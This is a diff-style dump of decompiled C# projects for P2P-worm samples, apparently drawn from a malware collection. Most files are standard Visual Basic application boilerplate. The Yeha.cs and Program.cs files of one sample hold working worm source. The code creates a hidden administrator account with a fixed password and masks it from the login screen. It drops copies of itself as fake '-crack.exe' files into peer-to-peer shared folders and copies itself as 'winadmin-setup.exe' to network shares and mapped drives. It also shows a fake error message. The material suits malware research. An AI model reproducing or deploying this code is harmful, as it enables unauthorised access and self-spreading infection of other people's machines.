MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/MyApplication.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyApplication
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace stub.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyApplication : WindowsFormsApplicationBase
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
[STAThread]
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyComputer
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace stub.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal class MyComputer : Computer
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyComputer()
{
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/MyProject.cs
+207
View File
@@ -0,0 +1,207 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MyProject
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace stub.My
{
[StandardModule]
[HideModuleName]
[GeneratedCode("MyTemplate", "10.0.0.0")]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/MySettings.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MySettings
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace stub.My
{
[CompilerGenerated]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
bool lockTaken = false;
try
{
Monitor.Enter(handlerLockObject, ref lockTaken);
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
if (lockTaken)
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.MySettingsProperty
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace stub.My
{
[HideModuleName]
[DebuggerNonUserCode]
[CompilerGenerated]
[StandardModule]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/My/Resources/Resources.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: stub.My.Resources.Resources
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace stub.My.Resources
{
[HideModuleName]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) stub.My.Resources.Resources.resourceMan, (object) null))
stub.My.Resources.Resources.resourceMan = new ResourceManager("stub.Resources", typeof (stub.My.Resources.Resources).Assembly);
return stub.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => stub.My.Resources.Resources.resourceCulture;
set => stub.My.Resources.Resources.resourceCulture = value;
}
internal static byte[] Interop_MessengerAPI => (byte[]) RuntimeHelpers.GetObjectValue(stub.My.Resources.Resources.ResourceManager.GetObject(nameof (Interop_MessengerAPI), stub.My.Resources.Resources.resourceCulture));
internal static byte[] Interop_MessengerPrivate => (byte[]) RuntimeHelpers.GetObjectValue(stub.My.Resources.Resources.ResourceManager.GetObject(nameof (Interop_MessengerPrivate), stub.My.Resources.Resources.resourceCulture));
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/P2P-Worm.MSIL.ShareWire.ay.csproj
+57
View File
@@ -0,0 +1,57 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>stub</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<TargetFrameworkProfile />
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<FileAlignment>512</FileAlignment>
<RootNamespace>stub</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/P2P-Worm.MSIL.ShareWire.ay.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "stub", "P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7.csproj", "{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6A82A61B-CAC5-4950-A72E-F73F96BB5BE4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-d8ec6d31f4acc813de1053b3a60dd04fa27b0ed0ffa2b95c5200a6734eb19dc7/Resources.resx
+1973
View File
File diff suppressed because it is too large Load Diff
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/AssemblyInfo.cs
+14
View File
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("f19b3ceb-53f1-4565-ac7d-cf4c355ff48e")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyProduct("Yeha")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Yeha")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/P2P-Worm.MSIL.Small.e.csproj
+44
View File
@@ -0,0 +1,44 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{8AA0DE44-5414-4607-BD92-7958A96933E4}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Yeha</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Yeha</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.DirectoryServices" />
<Reference Include="System.Management" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Yeha.cs" />
<Compile Include="Program.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/P2P-Worm.MSIL.Small.e.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Yeha", "P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e.csproj", "{8AA0DE44-5414-4607-BD92-7958A96933E4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8AA0DE44-5414-4607-BD92-7958A96933E4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8AA0DE44-5414-4607-BD92-7958A96933E4}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8AA0DE44-5414-4607-BD92-7958A96933E4}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8AA0DE44-5414-4607-BD92-7958A96933E4}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/Program.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: Yeha.Program
// Assembly: Yeha, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 17833E27-DE2E-4DC9-A82C-D7D503ADE440
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e.exe
using System;
using System.Windows.Forms;
namespace Yeha
{
internal class Program
{
private static void Main(string[] args)
{
Yeha.Yeha yeha = new Yeha.Yeha();
if (!yeha.chkIt())
{
yeha.YehaUser();
yeha.CreateShare("C:\\Yeha", "Yeha");
}
yeha.Share();
yeha.p2p();
if (DateTime.Now.Day == 25)
{
int num1 = (int) MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
}
else
{
int num2 = (int) MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e/Yeha.cs
+134
View File
@@ -0,0 +1,134 @@
// Decompiled with JetBrains decompiler
// Type: Yeha.Yeha
// Assembly: Yeha, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 17833E27-DE2E-4DC9-A82C-D7D503ADE440
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Small.e-0002cd4f65b1b756ba4657ed24d7b4c902f3ebdd96744e8c85544abf0344954e.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.DirectoryServices;
using System.IO;
using System.Management;
namespace Yeha
{
internal class Yeha
{
private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
public bool chkIt()
{
if ((string) Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Yeha", nameof (Yeha), (object) nameof (Yeha)) == nameof (Yeha))
return true;
Registry.LocalMachine.OpenSubKey("Software", true).CreateSubKey(nameof (Yeha)).SetValue(nameof (Yeha), (object) this.me);
return false;
}
public void p2p()
{
foreach (object obj in new ArrayList()
{
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\Downloads"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\My Shared Folder"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Personal) + "\\Shared"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads"),
(object) (Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads")
})
{
string path = Convert.ToString(obj);
if (Directory.Exists(path))
{
foreach (string directory in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles)))
File.Copy(this.me, path + "\\" + directory.Substring(directory.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe", true);
}
}
}
public void YehaUser()
{
try
{
DirectoryEntry directoryEntry1 = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
DirectoryEntry directoryEntry2 = directoryEntry1.Children.Add(nameof (Yeha), "user");
directoryEntry2.Invoke("SetPassword", (object) "yehawashere");
directoryEntry2.CommitChanges();
directoryEntry1.Children.Find("Administrators", "group")?.Invoke("Add", (object) directoryEntry2.Path.ToString());
try
{
Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", nameof (Yeha), (object) 0, RegistryValueKind.DWord);
}
catch (Exception ex)
{
}
}
catch (Exception ex)
{
}
}
public void Share()
{
try
{
foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("select * from win32_share").Get())
{
string str = Convert.ToString(managementBaseObject["Name"]);
if (!str.Contains("$"))
File.Copy(this.me, "\\\\" + Environment.MachineName + "\\" + str + "\\winadmin-setup.exe", true);
}
}
catch (Exception ex)
{
}
Exception exception;
try
{
string name = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Map Network Drive MRU\\";
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name);
foreach (string valueName in registryKey.GetValueNames())
{
string str = registryKey.GetValue(valueName).ToString();
if (valueName.ToLower() != "mrulist")
{
try
{
File.Copy(this.me, str + "\\\\winadmin-setup.exe", true);
}
catch (Exception ex)
{
exception = ex;
}
}
}
registryKey.Close();
}
catch (Exception ex)
{
exception = ex;
}
}
public void CreateShare(string dir, string name)
{
try
{
Directory.CreateDirectory(dir);
ManagementClass managementClass = new ManagementClass("Win32_Share");
ManagementBaseObject methodParameters = managementClass.GetMethodParameters("Create");
methodParameters["Description"] = (object) name;
methodParameters["Name"] = (object) name;
methodParameters["Path"] = (object) dir;
methodParameters["Type"] = (object) 0;
if ((uint) managementClass.InvokeMethod("Create", methodParameters, (InvokeMethodOptions) null).Properties["ReturnValue"].Value != 0U || !Directory.Exists(dir))
return;
new DirectoryInfo(dir).Attributes = FileAttributes.Hidden;
}
catch (Exception ex)
{
}
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/AssemblyInfo.cs
+9
View File
@@ -0,0 +1,9 @@
using System.Reflection;
[assembly: AssemblyProduct("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd/My/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: My.MyApplication
// Assembly: worm, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8EC03A9B-2208-4FEE-92A0-7A52F1587AD3
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.Small.u-db4920b710fe27301d242a61910da03b239972d96a018370dcf7d2a5187b33cd.exe
